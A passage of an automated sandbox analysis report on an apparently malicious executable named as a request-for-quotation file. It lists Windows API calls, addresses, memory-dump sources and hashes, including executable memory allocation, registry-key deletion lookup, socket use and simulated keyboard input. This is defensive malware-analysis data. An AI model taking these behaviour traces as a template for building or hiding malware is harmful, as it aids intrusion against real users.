                                                                                • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime__swprintf
                                                                                • String ID: %.3d$WIN_XPe
                                                                                • API String ID: 2070861257-2409531811
                                                                                • Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                                                                • Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
                                                                                • Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                                                                • Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                                • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                  • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                • _memmove.LIBCMT ref: 0047E314
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                • String ID:
                                                                                • API String ID: 3659485706-0
                                                                                • Opcode ID: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
                                                                                • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                                • Opcode Fuzzy Hash: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
                                                                                • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                • CoUninitialize.OLE32 ref: 004780CE
                                                                                  • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                • String ID:
                                                                                • API String ID: 780911581-0
                                                                                • Opcode ID: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
                                                                                • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                                • Opcode Fuzzy Hash: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
                                                                                • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                • String ID:
                                                                                • API String ID: 2808897238-0
                                                                                • Opcode ID: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
                                                                                • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                                • Opcode Fuzzy Hash: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
                                                                                • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                                APIs
                                                                                • GetWindowRect.USER32(00C12DB8,?), ref: 00489863
                                                                                • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                                                                • Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
                                                                                • Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                                                                • Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                                                • String ID:
                                                                                • API String ID: 2214342067-0
                                                                                • Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                                • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                                • Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                                • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                                APIs
                                                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                • _strlen.LIBCMT ref: 004764D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID:
                                                                                • API String ID: 4218353326-0
                                                                                • Opcode ID: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
                                                                                • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                • Opcode Fuzzy Hash: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
                                                                                • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                                                                • Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
                                                                                • Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                                                                • Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
